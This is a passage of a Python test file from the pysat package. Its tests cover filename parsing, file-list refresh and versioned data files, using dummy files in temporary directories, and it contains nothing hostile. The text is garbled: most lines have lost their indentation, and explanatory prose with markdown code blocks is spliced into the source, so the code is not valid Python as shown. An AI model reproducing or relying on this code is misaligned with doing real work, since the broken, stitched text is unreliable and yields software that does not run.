# ---- pysat/tests/test_files.py (jklenzing/pysat, BSD-3-Clause) ----
"""
tests the pysat Files object and code
"""
import glob
import numpy as np
import os
import sys
from nose.tools import raises
import pandas as pds
import tempfile
import pysat
import pysat.instruments.pysat_testing
if sys.version_info[0] >= 3:
from importlib import reload as re_load
else:
re_load = reload
def create_dir(inst=None, temporary_file_list=False):
if inst is None:
# create instrument
inst = pysat.Instrument(platform='pysat', name='testing',
temporary_file_list=temporary_file_list)
# create data directories
try:
os.makedirs(inst.files.data_path)
except OSError:
pass
return
def remove_files(inst=None):
# remove any files
temp_dir = inst.files.data_path
for the_file in os.listdir(temp_dir):
if (the_file[0:13] == 'pysat_testing') & \
(the_file[-19:] == '.pysat_testing_file'):
file_path = os.path.join(temp_dir, the_file)
if os.path.isfile(file_path):
os.unlink(file_path)
# create year doy file set
def create_files(inst, start, stop, freq=None, use_doy=True, root_fname=None,
                 content=None):
if freq is None:
freq = '1D'
dates = pysat.utils.time.create_date_range(start, stop, freq=freq)
if root_fname is None:
root_fname = ''.join(('pysat_testing_junk_{year:04d}_gold_{day:03d}_',
'stuff.pysat_testing_file'))
# create empty file
for date in dates:
yr, doy = pysat.utils.time.getyrdoy(date)
        if not use_doy:
            doy = date.day
fname = os.path.join(inst.files.data_path, root_fname.format(year=yr,
day=doy, month=date.month, hour=date.hour,
minute=date.minute, second=date.second))
with open(fname, 'w') as f:
if content is not None:
f.write(content)
def list_files(tag=None, sat_id=None, data_path=None, format_str=None):
"""Return a Pandas Series of every file for chosen satellite data"""
if format_str is None:
format_str = ''.join(('pysat_testing_junk_{year:04d}_gold_{day:03d}_',
'stuff_{month:02d}_{hour:02d}_{minute:02d}_',
'{second:02d}.pysat_testing_file'))
if tag is not None:
if tag == '':
return pysat.Files.from_os(data_path=data_path,
format_str=format_str)
else:
raise ValueError('Unrecognized tag name')
else:
raise ValueError('A tag name must be passed ')
class TestNoDataDir():
def __init__(self, temporary_file_list=False):
self.temporary_file_list = temporary_file_list
def setup(self):
"""Runs before every method to create a clean testing setup."""
# store current pysat directory
self.saved_data_path = pysat.data_dir
pysat.data_dir = ''
re_load(pysat._files)
def teardown(self):
"""Runs after every method to clean up previous testing."""
pysat.data_dir = self.saved_data_path
re_load(pysat._files)
@raises(Exception)
def test_no_data_dir(self):
inst = pysat.Instrument()
class TestBasics():
def __init__(self, temporary_file_list=False):
self.temporary_file_list = temporary_file_list
def setup(self):
"""Runs before every method to create a clean testing setup."""
# store current pysat directory
self.data_path = pysat.data_dir
# create temporary directory
dir_name = tempfile.mkdtemp()
pysat.utils.set_data_dir(dir_name, store=False)
self.testInst = \
pysat.Instrument(inst_module=pysat.instruments.pysat_testing,
clean_level='clean',
temporary_file_list=self.temporary_file_list)
# create testing directory
create_dir(self.testInst)
def teardown(self):
"""Runs after every method to clean up previous testing."""
remove_files(self.testInst)
try:
pysat.utils.set_data_dir(self.data_path, store=False)
        except Exception:
pass
del self.testInst
def test_parse_delimited_filename(self):
"""Check ability to parse delimited files"""
# Note: Can be removed if future instrument that uses delimited
# filenames is added to routine travis end-to-end testing
fname = ''.join(('test_{year:4d}_{month:2d}_{day:2d}_{hour:2d}',
'_{minute:2d}_{second:2d}_v01_r02.cdf'))
year = np.ones(6)*2009
month = np.ones(6)*12
day = np.array([12, 15, 17, 19, 22, 24])
hour = np.array([8, 10, 6, 18, 3, 23])
minute = np.array([8, 10, 6, 18, 3, 59])
second = np.array([58, 11, 26, 2, 18, 59])
file_list = []
for i in range(6):
file_list.append(fname.format(year=year[i].astype(int),
month=month[i].astype(int),
day=day[i], hour=hour[i],
minute=minute[i], second=second[i]))
file_dict = pysat._files.parse_delimited_filenames(file_list, fname,
'_')
assert np.all(file_dict['year'] == year)
assert np.all(file_dict['month'] == month)
assert np.all(file_dict['day'] == day)
assert np.all(file_dict['hour'] == hour)
assert np.all(file_dict['minute'] == minute)
assert np.all(file_dict['day'] == day)
assert (file_dict['version'] is None)
assert (file_dict['revision'] is None)
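The test above exercises `pysat._files.parse_delimited_filenames`. As a rough illustration of the idea (aligning delimiter-split filename tokens with template tokens and extracting integers), here is a hypothetical, simplified sketch; the real pysat routine is more general.

```python
import re

def parse_delimited_sketch(file_list, template, delimiter):
    """Hypothetical, simplified take on parse_delimited_filenames:
    split both template and filenames on the delimiter, then read an
    integer out of every token that lines up with a {field:...} slot."""
    tokens = template.split(delimiter)
    out = {}
    for fname in file_list:
        for tok, part in zip(tokens, fname.split(delimiter)):
            field = re.match(r'\{(\w+):', tok)
            if field:
                out.setdefault(field.group(1), []).append(
                    int(re.match(r'\d+', part).group()))
    return out
```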
def test_year_doy_files_direct_call_to_from_os(self):
# create a bunch of files by year and doy
start = pysat.datetime(2008, 1, 1)
stop = pysat.datetime(2009, 12, 31)
create_files(self.testInst, start, stop, freq='1D')
# use from_os function to get pandas Series of files and dates
files = pysat.Files.from_os(data_path=self.testInst.files.data_path,
format_str=''.join(('pysat_testing_junk_',
'{year:04d}_gold_',
'{day:03d}_stuff.',
'pysat_testing_file')))
# check overall length
check1 = len(files) == (365 + 366)
# check specific dates
check2 = pds.to_datetime(files.index[0]) == pysat.datetime(2008, 1, 1)
check3 = pds.to_datetime(files.index[365]) == \
pysat.datetime(2008, 12, 31)
check4 = pds.to_datetime(files.index[-1]) == \
pysat.datetime(2009, 12, 31)
assert(check1 & check2 & check3 & check4)
def test_year_doy_files_no_gap_in_name_direct_call_to_from_os(self):
# create a bunch of files by year and doy
start = pysat.datetime(2008, 1, 1)
stop = pysat.datetime(2009, 12, 31)
create_files(self.testInst, start, stop, freq='1D',
root_fname=''.join(('pysat_testing_junk_{year:04d}',
'{day:03d}_stuff.pysat_testing_',
'file')))
# use from_os function to get pandas Series of files and dates
files = pysat.Files.from_os(data_path=self.testInst.files.data_path,
format_str=''.join(('pysat_testing_junk_',
'{year:04d}{day:03d}_',
'stuff.pysat_testing_',
'file')))
# check overall length
check1 = len(files) == (365 + 366)
# check specific dates
check2 = pds.to_datetime(files.index[0]) == pysat.datetime(2008, 1, 1)
check3 = pds.to_datetime(files.index[365]) == \
pysat.datetime(2008, 12, 31)
check4 = pds.to_datetime(files.index[-1]) == \
pysat.datetime(2009, 12, 31)
assert(check1 & check2 & check3 & check4)
def test_year_month_day_files_direct_call_to_from_os(self):
# create a bunch of files by year and doy
start = pysat.datetime(2008, 1, 1)
stop = pysat.datetime(2009, 12, 31)
create_files(self.testInst, start, stop, freq='1D', use_doy=False,
root_fname=''.join(('pysat_testing_junk_{year:04d}_gold_',
'{day:03d}_stuff_{month:02d}.pysat_',
'testing_file')))
# use from_os function to get pandas Series of files and dates
files = pysat.Files.from_os(data_path=self.testInst.files.data_path,
format_str=''.join(('pysat_testing_junk_',
'{year:04d}_gold_',
'{day:03d}_stuff_',
'{month:02d}.pysat_',
'testing_file')))
# check overall length
check1 = len(files) == (365 + 366)
# check specific dates
check2 = pds.to_datetime(files.index[0]) == pysat.datetime(2008, 1, 1)
check3 = pds.to_datetime(files.index[365]) == \
pysat.datetime(2008, 12, 31)
check4 = pds.to_datetime(files.index[-1]) == \
pysat.datetime(2009, 12, 31)
assert(check1 & check2 & check3 & check4)
def test_year_month_day_hour_files_direct_call_to_from_os(self):
# create a bunch of files by year and doy
start = pysat.datetime(2008, 1, 1)
stop = pysat.datetime(2009, 12, 31)
create_files(self.testInst, start, stop, freq='6h',
use_doy=False,
root_fname=''.join(('pysat_testing_junk_{year:04d}_gold_',
'{day:03d}_stuff_{month:02d}_',
'{hour:02d}.pysat_testing_file')))
# use from_os function to get pandas Series of files and dates
files = pysat.Files.from_os(data_path=self.testInst.files.data_path,
format_str=''.join(('pysat_testing_junk_',
'{year:04d}_gold_',
'{day:03d}_stuff_',
'{month:02d}_',
'{hour:02d}.pysat_',
'testing_file')))
# check overall length
check1 = len(files) == (365+366)*4-3
# check specific dates
check2 = pds.to_datetime(files.index[0]) == pysat.datetime(2008, 1, 1)
check3 = pds.to_datetime(files.index[1460]) == \
pysat.datetime(2008, 12, 31)
check4 = pds.to_datetime(files.index[-1]) == \
pysat.datetime(2009, 12, 31)
assert(check1 & check2 & check3 & check4)
def test_year_month_day_hour_minute_files_direct_call_to_from_os(self):
root_fname = ''.join(('pysat_testing_junk_{year:04d}_gold_{day:03d}_',
'stuff_{month:02d}_{hour:02d}{minute:02d}.',
'pysat_testing_file'))
# create a bunch of files by year and doy
start = pysat.datetime(2008, 1, 1)
stop = pysat.datetime(2008, 1, 4)
create_files(self.testInst, start, stop, freq='30min',
use_doy=False,
root_fname=root_fname)
# use from_os function to get pandas Series of files and dates
files = pysat.Files.from_os(data_path=self.testInst.files.data_path,
format_str=root_fname)
# check overall length
check1 = len(files) == 145
# check specific dates
check2 = pds.to_datetime(files.index[0]) == pysat.datetime(2008, 1, 1)
check3 = pds.to_datetime(files.index[1]) == \
pysat.datetime(2008, 1, 1, 0, 30)
check4 = pds.to_datetime(files.index[10]) == \
pysat.datetime(2008, 1, 1, 5, 0)
check5 = pds.to_datetime(files.index[-1]) == pysat.datetime(2008, 1, 4)
assert(check1 & check2 & check3 & check4 & check5)
def test_year_month_day_hour_minute_second_files_direct_call_to_from_os(self):
root_fname = ''.join(('pysat_testing_junk_{year:04d}_gold_{day:03d}_',
'stuff_{month:02d}_{hour:02d}_{minute:02d}_',
'{second:02d}.pysat_testing_file'))
# create a bunch of files by year and doy
start = pysat.datetime(2008, 1, 1)
stop = pysat.datetime(2008, 1, 3)
create_files(self.testInst, start, stop, freq='30s',
use_doy=False, root_fname=root_fname)
# use from_os function to get pandas Series of files and dates
files = pysat.Files.from_os(data_path=self.testInst.files.data_path,
format_str=root_fname)
# check overall length
check1 = len(files) == 5761
# check specific dates
check2 = pds.to_datetime(files.index[0]) == pysat.datetime(2008, 1, 1)
check3 = pds.to_datetime(files.index[1]) == \
pysat.datetime(2008, 1, 1, 0, 0, 30)
check4 = pds.to_datetime(files.index[-1]) == \
pysat.datetime(2008, 1, 3)
assert(check1 & check2 & check3 & check4)
def test_year_month_files_direct_call_to_from_os(self):
# create a bunch of files by year and doy
start = pysat.datetime(2008, 1, 1)
stop = pysat.datetime(2009, 12, 31)
create_files(self.testInst, start, stop, freq='1MS',
root_fname=''.join(('pysat_testing_junk_{year:04d}_gold_',
'stuff_{month:02d}.pysat_testing_',
'file')))
# use from_os function to get pandas Series of files and dates
files = pysat.Files.from_os(data_path=self.testInst.files.data_path,
format_str=''.join(('pysat_testing_junk_',
'{year:04d}_gold_',
'stuff_{month:02d}.',
'pysat_testing_file')))
# check overall length
check1 = len(files) == 24
# check specific dates
check2 = pds.to_datetime(files.index[0]) == pysat.datetime(2008, 1, 1)
check3 = pds.to_datetime(files.index[11]) == \
pysat.datetime(2008, 12, 1)
check4 = pds.to_datetime(files.index[-1]) == \
pysat.datetime(2009, 12, 1)
assert(check1 & check2 & check3 & check4)
def test_instrument_has_no_files(self):
import pysat.instruments.pysat_testing
pysat.instruments.pysat_testing.list_files = list_files
inst = pysat.Instrument(platform='pysat', name='testing',
update_files=True)
re_load(pysat.instruments.pysat_testing)
assert(inst.files.files.empty)
def test_instrument_has_files(self):
import pysat.instruments.pysat_testing
root_fname = ''.join(('pysat_testing_junk_{year:04d}_gold_{day:03d}_'
'stuff_{month:02d}_{hour:02d}_{minute:02d}_'
'{second:02d}.pysat_testing_file'))
# create a bunch of files by year and doy
start = pysat.datetime(2007, 12, 31)
stop = pysat.datetime(2008, 1, 10)
create_files(self.testInst, start, stop, freq='100min',
use_doy=False, root_fname=root_fname)
# create the same range of dates
dates = pysat.utils.time.create_date_range(start, stop, freq='100min')
pysat.instruments.pysat_testing.list_files = list_files
inst = pysat.Instrument(platform='pysat', name='testing',
update_files=True)
re_load(pysat.instruments.pysat_testing)
assert (np.all(inst.files.files.index == dates))
class TestBasicsNoFileListStorage(TestBasics):
def __init__(self, temporary_file_list=True):
self.temporary_file_list = temporary_file_list
class TestInstrumentWithFiles():
def __init__(self, temporary_file_list=False):
self.temporary_file_list = temporary_file_list
def setup(self):
"""Runs before every method to create a clean testing setup."""
# store current pysat directory
self.data_path = pysat.data_dir
# create temporary directory
dir_name = tempfile.mkdtemp()
pysat.utils.set_data_dir(dir_name, store=False)
# create testing directory
create_dir(temporary_file_list=self.temporary_file_list)
# create a test instrument, make sure it is getting files from
# filesystem
re_load(pysat.instruments.pysat_testing)
pysat.instruments.pysat_testing.list_files = list_files
# create a bunch of files by year and doy
self.testInst = \
pysat.Instrument(inst_module=pysat.instruments.pysat_testing,
clean_level='clean',
temporary_file_list=self.temporary_file_list)
self.root_fname = ''.join(('pysat_testing_junk_{year:04d}_gold_',
'{day:03d}_stuff_{month:02d}_{hour:02d}_',
'{minute:02d}_{second:02d}.pysat_testing_',
'file'))
start = pysat.datetime(2007, 12, 31)
stop = pysat.datetime(2008, 1, 10)
create_files(self.testInst, start, stop, freq='100min',
use_doy=False, root_fname=self.root_fname)
self.testInst = \
pysat.Instrument(inst_module=pysat.instruments.pysat_testing,
clean_level='clean',
update_files=True,
temporary_file_list=self.temporary_file_list)
def teardown(self):
"""Runs after every method to clean up previous testing."""
remove_files(self.testInst)
del self.testInst
re_load(pysat.instruments.pysat_testing)
re_load(pysat.instruments)
# make sure everything about instrument state is restored
# restore original file list, no files
pysat.Instrument(inst_module=pysat.instruments.pysat_testing,
clean_level='clean',
update_files=True,
temporary_file_list=self.temporary_file_list)
pysat.utils.set_data_dir(self.data_path, store=False)
def test_refresh(self):
# create new files and make sure that new files are captured
start = pysat.datetime(2008, 1, 10)
stop = pysat.datetime(2008, 1, 12)
create_files(self.testInst, start, stop, freq='100min',
use_doy=False,
root_fname=self.root_fname)
start = pysat.datetime(2007, 12, 31)
dates = pysat.utils.time.create_date_range(start, stop, freq='100min')
self.testInst.files.refresh()
assert (np.all(self.testInst.files.files.index == dates))
def test_refresh_on_ignore_empty_files(self):
# setup created empty files - make sure such files can be ignored
self.testInst.files.ignore_empty_files = True
self.testInst.files.refresh()
assert len(self.testInst.files.files) == 0
# create new files with content and make sure they are captured
start = pysat.datetime(2007, 12, 31)
stop = pysat.datetime(2008, 1, 10)
create_files(self.testInst, start, stop, freq='100min',
use_doy=False,
root_fname=self.root_fname,
                     content='test')
dates = pysat.utils.time.create_date_range(start, stop, freq='100min')
self.testInst.files.refresh()
assert (np.all(self.testInst.files.files.index == dates))
def test_instrument_with_ignore_empty_files(self):
"""Make sure new instruments can ignore empty files"""
self.testInst = \
pysat.Instrument(inst_module=pysat.instruments.pysat_testing,
clean_level='clean',
update_files=True,
temporary_file_list=self.temporary_file_list,
ignore_empty_files=True)
assert len(self.testInst.files.files) == 0
# create new files with content and make sure they are captured
start = pysat.datetime(2007, 12, 31)
stop = pysat.datetime(2008, 1, 10)
create_files(self.testInst, start, stop, freq='100min',
use_doy=False,
root_fname=self.root_fname,
                     content='test')
dates = pysat.utils.time.create_date_range(start, stop, freq='100min')
self.testInst.files.refresh()
assert (np.all(self.testInst.files.files.index == dates))
def test_refresh_on_unchanged_files(self):
start = pysat.datetime(2007, 12, 31)
stop = pysat.datetime(2008, 1, 10)
dates = pysat.utils.time.create_date_range(start, stop, freq='100min')
self.testInst.files.refresh()
assert (np.all(self.testInst.files.files.index == dates))
def test_get_new_files_after_refresh(self):
# create new files and make sure that new files are captured
start = pysat.datetime(2008, 1, 11)
stop = pysat.datetime(2008, 1, 12)
create_files(self.testInst, start, stop, freq='100min',
use_doy=False,
root_fname=self.root_fname)
dates = pysat.utils.time.create_date_range(start, stop, freq='100min')
self.testInst.files.refresh()
new_files = self.testInst.files.get_new()
assert (np.all(new_files.index == dates))
def test_get_new_files_after_multiple_refreshes(self):
# create new files and make sure that new files are captured
start = pysat.datetime(2008, 1, 11)
stop = pysat.datetime(2008, 1, 12)
create_files(self.testInst, start, stop, freq='100min',
use_doy=False,
root_fname=self.root_fname)
dates = pysat.utils.time.create_date_range(start, stop, freq='100min')
self.testInst.files.refresh()
self.testInst.files.refresh()
self.testInst.files.refresh()
new_files = self.testInst.files.get_new()
assert (np.all(new_files.index == dates))
def test_get_new_files_after_adding_files(self):
# create new files and make sure that new files are captured
start = pysat.datetime(2008, 1, 11)
stop = pysat.datetime(2008, 1, 12)
create_files(self.testInst, start, stop, freq='100min',
use_doy=False,
root_fname=self.root_fname)
dates = pysat.utils.time.create_date_range(start, stop, freq='100min')
new_files = self.testInst.files.get_new()
assert (np.all(new_files.index == dates))
def test_get_new_files_after_adding_files_and_adding_file(self):
# create new files and make sure that new files are captured
start = pysat.datetime(2008, 1, 11)
stop = pysat.datetime(2008, 1, 12)
create_files(self.testInst, start, stop, freq='100min',
use_doy=False,
root_fname=self.root_fname)
dates = pysat.utils.time.create_date_range(start, stop, freq='100min')
new_files = self.testInst.files.get_new()
start = pysat.datetime(2008, 1, 15)
stop = pysat.datetime(2008, 1, 18)
create_files(self.testInst, start, stop, freq='100min',
use_doy=False,
root_fname=self.root_fname)
dates2 = pysat.utils.time.create_date_range(start, stop, freq='100min')
new_files2 = self.testInst.files.get_new()
assert (np.all(new_files.index == dates) &
np.all(new_files2.index == dates2))
def test_get_new_files_after_deleting_files_and_adding_files(self):
# create new files and make sure that new files are captured
start = pysat.datetime(2008, 1, 11)
stop = pysat.datetime(2008, 1, 12)
dates = pysat.utils.time.create_date_range(start, stop, freq='100min')
# remove files, same number as will be added
to_be_removed = len(dates)
for the_file in os.listdir(self.testInst.files.data_path):
if (the_file[0:13] == 'pysat_testing') & \
(the_file[-19:] == '.pysat_testing_file'):
file_path = os.path.join(self.testInst.files.data_path,
the_file)
if os.path.isfile(file_path) & (to_be_removed > 0):
to_be_removed -= 1
os.unlink(file_path)
# add new files
create_files(self.testInst, start, stop, freq='100min',
use_doy=False, root_fname=self.root_fname)
# get new files
new_files = self.testInst.files.get_new()
assert (np.all(new_files.index == dates))
def test_files_non_standard_pysat_directory(self):
# create new files and make sure that new files are captured
start = pysat.datetime(2008, 1, 11)
stop = pysat.datetime(2008, 1, 15)
dates = pysat.utils.time.create_date_range(start, stop, freq='100min')
self.testInst = \
pysat.Instrument(inst_module=pysat.instruments.pysat_testing,
clean_level='clean',
sat_id='hello',
directory_format='pysat_testing_{tag}_{sat_id}',
update_files=True,
temporary_file_list=self.temporary_file_list)
# add new files
create_dir(self.testInst)
remove_files(self.testInst)
create_files(self.testInst, start, stop, freq='100min',
use_doy=False, root_fname=self.root_fname)
self.testInst = \
pysat.Instrument(inst_module=pysat.instruments.pysat_testing,
clean_level='clean',
sat_id='hello',
directory_format=''.join(('pysat_testing_',
'{tag}_{sat_id}')),
update_files=True,
temporary_file_list=self.temporary_file_list)
# get new files
new_files = self.testInst.files.get_new()
assert (np.all(self.testInst.files.files.index == dates) &
np.all(new_files.index == dates))
def test_files_non_standard_file_format_template(self):
# create new files and make sure that new files are captured
start = pysat.datetime(2008, 1, 11)
stop = pysat.datetime(2008, 1, 15)
dates = pysat.utils.time.create_date_range(start, stop, freq='1D')
# clear out old files, create new ones
remove_files(self.testInst)
create_files(self.testInst, start, stop, freq='1D',
use_doy=False,
root_fname=''.join(('pysat_testing_unique_junk_',
'{year:04d}_gold_{day:03d}_stuff',
'.pysat_testing_file')))
pysat.instruments.pysat_testing.list_files = list_files
self.testInst = \
pysat.Instrument(inst_module=pysat.instruments.pysat_testing,
clean_level='clean',
file_format=''.join(('pysat_testing_unique_',
'junk_{year:04d}_gold_',
'{day:03d}_stuff',
'.pysat_testing_file')),
update_files=True,
temporary_file_list=self.temporary_file_list)
assert (np.all(self.testInst.files.files.index == dates))
@raises(ValueError)
def test_files_non_standard_file_format_template_misformatted(self):
pysat.instruments.pysat_testing.list_files = list_files
self.testInst = \
pysat.Instrument(inst_module=pysat.instruments.pysat_testing,
clean_level='clean',
file_format=''.join(('pysat_testing_unique_',
'junk_stuff.pysat_testing',
'_file')),
update_files=True,
temporary_file_list=self.temporary_file_list)
@raises(ValueError)
def test_files_non_standard_file_format_template_misformatted_2(self):
pysat.instruments.pysat_testing.list_files = list_files
self.testInst = \
pysat.Instrument(inst_module=pysat.instruments.pysat_testing,
clean_level='clean',
file_format=15,
update_files=True,
temporary_file_list=self.temporary_file_list)
class TestInstrumentWithFilesNoFileListStorage(TestInstrumentWithFiles):
def __init__(self, temporary_file_list=True):
self.temporary_file_list = temporary_file_list
# create year doy file set with multiple versions
def create_versioned_files(inst, start=None, stop=None, freq='1D',
use_doy=True, root_fname=None):
# create a bunch of files
if start is None:
start = pysat.datetime(2009, 1, 1)
if stop is None:
stop = pysat.datetime(2013, 12, 31)
dates = pysat.utils.time.create_date_range(start, stop, freq=freq)
versions = np.array([1, 2])
revisions = np.array([0, 1])
if root_fname is None:
root_fname = ''.join(('pysat_testing_junk_{year:04d}_{month:02d}_',
'{day:03d}{hour:02d}{minute:02d}{second:02d}_',
'stuff_{version:02d}_{revision:03d}.pysat_',
'testing_file'))
# create empty file
for date in dates:
for version in versions:
for revision in revisions:
yr, doy = pysat.utils.time.getyrdoy(date)
                if not use_doy:
                    doy = date.day
fname = os.path.join(inst.files.data_path,
root_fname.format(year=yr,
day=doy,
month=date.month,
hour=date.hour,
minute=date.minute,
second=date.second,
version=version,
revision=revision))
with open(fname, 'w') as f:
pass
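For reference, the default root_fname template above expands like this (the date and version values below are illustrative, not taken from the tests):

```python
# Hypothetical values, just to show how the filename template expands.
root_fname = ''.join(('pysat_testing_junk_{year:04d}_{month:02d}_',
                      '{day:03d}{hour:02d}{minute:02d}{second:02d}_',
                      'stuff_{version:02d}_{revision:03d}.pysat_',
                      'testing_file'))
name = root_fname.format(year=2009, month=1, day=1, hour=0, minute=0,
                         second=0, version=1, revision=0)
# {day:03d} is wide enough for either a day of year (1-366) or a day of month
print(name)  # pysat_testing_junk_2009_01_001000000_stuff_01_000.pysat_testing_file
```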
def list_versioned_files(tag=None, sat_id=None, data_path=None,
format_str=None):
"""Return a Pandas Series of every file for chosen satellite data"""
if format_str is None:
format_str = ''.join(('pysat_testing_junk_{year:04d}_{month:02d}_',
'{day:03d}{hour:02d}{minute:02d}{second:02d}_',
'stuff_{version:02d}_{revision:03d}.pysat_',
'testing_file'))
if tag is not None:
if tag == '':
return pysat.Files.from_os(data_path=data_path,
format_str=format_str)
else:
raise ValueError('Unrecognized tag name')
else:
raise ValueError('A tag name must be passed')
class TestInstrumentWithVersionedFiles():
def __init__(self, temporary_file_list=False):
self.temporary_file_list = temporary_file_list
def setup(self):
"""Runs before every method to create a clean testing setup."""
# store current pysat directory
self.data_path = pysat.data_dir
# create temporary directory
dir_name = tempfile.gettempdir()
pysat.utils.set_data_dir(dir_name, store=False)
# create testing directory
create_dir(temporary_file_list=self.temporary_file_list)
# create a test instrument, make sure it is getting files from
# filesystem
re_load(pysat.instruments.pysat_testing)
pysat.instruments.pysat_testing.list_files = list_versioned_files
# create a bunch of files by year and doy
self.testInst = \
pysat.Instrument(inst_module=pysat.instruments.pysat_testing,
clean_level='clean',
temporary_file_list=self.temporary_file_list)
self.root_fname = ''.join(('pysat_testing_junk_{year:04d}_{month:02d}',
'_{day:03d}{hour:02d}{minute:02d}',
'{second:02d}_stuff_{version:02d}_',
'{revision:03d}.pysat_testing_file'))
start = pysat.datetime(2007, 12, 31)
stop = pysat.datetime(2008, 1, 10)
create_versioned_files(self.testInst, start, stop, freq='100min',
use_doy=False, root_fname=self.root_fname)
self.testInst = \
pysat.Instrument(inst_module=pysat.instruments.pysat_testing,
clean_level='clean',
update_files=True,
temporary_file_list=self.temporary_file_list)
def teardown(self):
"""Runs after every method to clean up previous testing."""
remove_files(self.testInst)
del self.testInst
re_load(pysat.instruments.pysat_testing)
re_load(pysat.instruments)
# make sure everything about instrument state is restored
# restore original file list, no files
pysat.Instrument(inst_module=pysat.instruments.pysat_testing,
clean_level='clean',
update_files=True,
temporary_file_list=self.temporary_file_list)
pysat.utils.set_data_dir(self.data_path, store=False)
def test_refresh(self):
# create new files and make sure that new files are captured
# files already exist from 2007-12-31 through 2008-01-10
start = pysat.datetime(2008, 1, 10)
stop = pysat.datetime(2008, 1, 12)
create_versioned_files(self.testInst, start, stop, freq='100min',
use_doy=False,
root_fname=self.root_fname)
# create list of dates for all files that should be there
start = pysat.datetime(2007, 12, 31)
dates = pysat.utils.time.create_date_range(start, stop, freq='100min')
# update instrument file list
self.testInst.files.refresh()
assert (np.all(self.testInst.files.files.index == dates))
def test_refresh_on_unchanged_files(self):
start = pysat.datetime(2007, 12, 31)
stop = pysat.datetime(2008, 1, 10)
dates = pysat.utils.time.create_date_range(start, stop, freq='100min')
self.testInst.files.refresh()
assert (np.all(self.testInst.files.files.index == dates))
def test_get_new_files_after_refresh(self):
# create new files and make sure that new files are captured
start = pysat.datetime(2008, 1, 11)
stop = pysat.datetime(2008, 1, 12)
create_versioned_files(self.testInst, start, stop, freq='100min',
use_doy=False,
root_fname=self.root_fname)
dates = pysat.utils.time.create_date_range(start, stop, freq='100min')
self.testInst.files.refresh()
new_files = self.testInst.files.get_new()
assert (np.all(new_files.index == dates))
def test_get_new_files_after_multiple_refreshes(self):
# create new files and make sure that new files are captured
start = pysat.datetime(2008, 1, 11)
stop = pysat.datetime(2008, 1, 12)
create_versioned_files(self.testInst, start, stop, freq='100min',
use_doy=False,
root_fname=self.root_fname)
dates = pysat.utils.time.create_date_range(start, stop, freq='100min')
self.testInst.files.refresh()
self.testInst.files.refresh()
self.testInst.files.refresh()
new_files = self.testInst.files.get_new()
assert (np.all(new_files.index == dates))
def test_get_new_files_after_adding_files(self):
# create new files and make sure that new files are captured
start = pysat.datetime(2008, 1, 11)
stop = pysat.datetime(2008, 1, 12)
create_versioned_files(self.testInst, start, stop, freq='100min',
use_doy=False,
root_fname=self.root_fname)
dates = pysat.utils.time.create_date_range(start, stop, freq='100min')
new_files = self.testInst.files.get_new()
assert (np.all(new_files.index == dates))
def test_get_new_files_after_adding_files_and_adding_file(self):
# create new files and make sure that new files are captured
start = pysat.datetime(2008, 1, 11)
stop = pysat.datetime(2008, 1, 12)
create_versioned_files(self.testInst, start, stop, freq='100min',
use_doy=False,
root_fname=self.root_fname)
dates = pysat.utils.time.create_date_range(start, stop, freq='100min')
new_files = self.testInst.files.get_new()
start = pysat.datetime(2008, 1, 15)
stop = pysat.datetime(2008, 1, 18)
create_versioned_files(self.testInst, start, stop, freq='100min',
use_doy=False,
root_fname=self.root_fname)
dates2 = pysat.utils.time.create_date_range(start, stop, freq='100min')
new_files2 = self.testInst.files.get_new()
assert (np.all(new_files.index == dates) &
np.all(new_files2.index == dates2))
def test_get_new_files_after_deleting_files_and_adding_files(self):
# create new files and make sure that new files are captured
start = pysat.datetime(2008, 1, 11)
stop = pysat.datetime(2008, 1, 12)
dates = pysat.utils.time.create_date_range(start, stop, freq='100min')
# remove files, same number as will be added
to_be_removed = len(dates)
for the_file in os.listdir(self.testInst.files.data_path):
if (the_file[0:13] == 'pysat_testing') & \
(the_file[-19:] == '.pysat_testing_file'):
file_path = os.path.join(self.testInst.files.data_path,
the_file)
if os.path.isfile(file_path) & (to_be_removed > 0):
to_be_removed -= 1
# Remove all versions of the file
# otherwise, previous versions will look like new files
pattern = '_'.join(file_path.split('_')[0:7]) + \
'*.pysat_testing_file'
# use an explicit loop; map() is lazy in Python 3 and would delete nothing
for match in glob.glob(pattern):
os.unlink(match)
# add new files
create_versioned_files(self.testInst, start, stop, freq='100min',
use_doy=False, root_fname=self.root_fname)
# get new files
new_files = self.testInst.files.get_new()
assert (np.all(new_files.index == dates))
def test_files_non_standard_pysat_directory(self):
# create new files and make sure that new files are captured
start = pysat.datetime(2008, 1, 11)
stop = pysat.datetime(2008, 1, 15)
dates = pysat.utils.time.create_date_range(start, stop, freq='100min')
pysat.instruments.pysat_testing.list_files = list_versioned_files
self.testInst = \
pysat.Instrument(inst_module=pysat.instruments.pysat_testing,
clean_level='clean',
sat_id='hello',
directory_format='pysat_testing_{tag}_{sat_id}',
update_files=True,
temporary_file_list=self.temporary_file_list)
# add new files
create_dir(self.testInst)
remove_files(self.testInst)
create_versioned_files(self.testInst, start, stop, freq='100min',
use_doy=False, root_fname=self.root_fname)
self.testInst = \
pysat.Instrument(inst_module=pysat.instruments.pysat_testing,
clean_level='clean',
sat_id='hello',
directory_format='pysat_testing_{tag}_{sat_id}',
update_files=True,
temporary_file_list=self.temporary_file_list)
# get new files
new_files = self.testInst.files.get_new()
assert (np.all(self.testInst.files.files.index == dates) &
np.all(new_files.index == dates))
def test_files_non_standard_file_format_template(self):
# create new files and make sure that new files are captured
start = pysat.datetime(2008, 1, 11)
stop = pysat.datetime(2008, 1, 15)
dates = pysat.utils.time.create_date_range(start, stop, freq='1D')
# clear out old files, create new ones
remove_files(self.testInst)
create_versioned_files(self.testInst, start, stop, freq='1D',
use_doy=False,
root_fname=''.join(('pysat_testing_unique_',
'{version:02d}_',
'{revision:03d}_{year:04d}',
'_g_{day:03d}_st.pysat_',
'testing_file')))
pysat.instruments.pysat_testing.list_files = list_versioned_files
self.testInst = \
pysat.Instrument(inst_module=pysat.instruments.pysat_testing,
clean_level='clean',
file_format=''.join(('pysat_testing_unique_',
'{version:02d}_',
'{revision:03d}_{year:04d}_',
'g_{day:03d}_st.pysat_',
'testing_file')),
update_files=True,
temporary_file_list=self.temporary_file_list)
assert (np.all(self.testInst.files.files.index == dates))
def test_files_when_duplicates_forced(self):
# create new files and make sure that new files are captured
start = pysat.datetime(2008, 1, 11)
stop = pysat.datetime(2008, 1, 15)
dates = pysat.utils.time.create_date_range(start, stop, freq='1D')
# clear out old files, create new ones
remove_files(self.testInst)
create_versioned_files(self.testInst, start, stop, freq='1D',
use_doy=False,
root_fname=''.join(('pysat_testing_unique_',
'{version:02d}_',
'{revision:03d}_{year:04d}',
'_g_{day:03d}_st.pysat_',
